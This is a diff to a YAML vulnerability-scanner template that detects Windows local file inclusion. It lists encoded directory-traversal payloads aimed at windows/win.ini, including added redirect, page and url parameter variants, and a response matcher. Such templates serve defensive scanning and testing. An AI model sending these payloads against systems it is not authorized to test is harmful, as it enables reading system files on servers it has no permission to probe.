--- a/vulnerabilities/generic/generic-windows-lfi.yaml
+++ b/vulnerabilities/generic/generic-windows-lfi.yaml
@@ -1,10 +1,10 @@
-id: azure-directory-traversal
+id: generic-windows-lfi
 
 info:
-  name: Azure Directory Traversal
-  author: mesaglio
+  name: Generic Windows based LFI Test
+  author: mesaglio,sushantkamble
   severity: high
-  description: Detect azure directory traversal hosts file.
+  description:  Searches for /windows/win.ini on passed URLs
   tags: azure,windows,lfi
 
 requests:
@@ -17,13 +17,11 @@ requests:
       - "{{BaseURL}}/%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2ewindows/win.ini"
       - "{{BaseURL}}/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows/win.ini"
       - "{{BaseURL}}/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini"
+      - "{{BaseURL}}/?redirect=..%2f..%2f..%2f..%2fwindows/win.ini"
+      - "{{BaseURL}}/?page=..%2f..%2f..%2f..%2f..%2fwindows/win.ini"
+      - "{{BaseURL}}/?url=..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini"
 
-    matchers-condition: and
     matchers:
-      - type: status
-        status:
-          - 200
-
       - type: word
         words:
           - "bit app support"
